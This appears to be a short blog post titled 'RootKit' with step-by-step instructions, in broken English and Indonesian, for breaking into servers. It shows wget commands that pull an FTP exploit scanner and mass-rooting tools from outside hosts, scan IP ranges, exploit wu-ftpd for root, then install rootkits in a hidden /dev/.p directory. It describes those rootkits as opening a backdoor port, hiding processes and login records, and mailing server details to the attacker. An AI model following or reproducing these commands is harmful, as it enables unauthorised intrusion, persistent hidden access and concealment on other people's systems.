First you need a shell witch you will scan for other shells/roots with this scanner: wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz after you download it, start scaning: tar -xzvf wu2.tar.gz unpacking the arhive cd alpyftpd/ ./scan 203 21 180 203 - first IP class 21 - its necesary, its the FTP port, the exploit its for FTP 180 - second IP class wew rootkit: its a backdoor witch lets you connect to the server throught another port and pass set by you.that makes you invisible, hides screen, ps, w, last and all your procces. wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz tar -xzvf X.tar.gz unpacking the arhive cd X/ ./install root password port e-mail root - its necesary, its the ID password - its set the password you want for root port - the port you connect through on ssh e-mail - your mail to recive the information about the server and your options Example: ./install root dexter 1402 dextervaneza@yahoo.com that means you connect to server on port 1402 with id root and password ATENTION ::. untuk xpost scanner : liad di bawah ini : wget http://www.cyberborneo.com/tools/xpost.tgz tar -zxvf xpost.tgz cd xpost cd xwurm ./scan 200.152 When scan finished type ./masswu wu-scan.log And if another IP SAY SECCUES u HAVE ROOT ON THIS IP... u must to connect on it with awu if u don't have awu then get it wget www.geocities.com/blackhat12001/dimi.tgz tar -zxvf dimi.tgz cd awu ./wu -a -d IP ( or box so sayed Succes) when he coonnect on box type: cd /dev mkdir .p cd .p wget www.geocities.com/blackhat12001/r00tk1t.tgz tar -zxvf r00tk1t.tgz cd shv4 ./setup [password] [port] port mematikan : 53
0 Responses to “RootKit”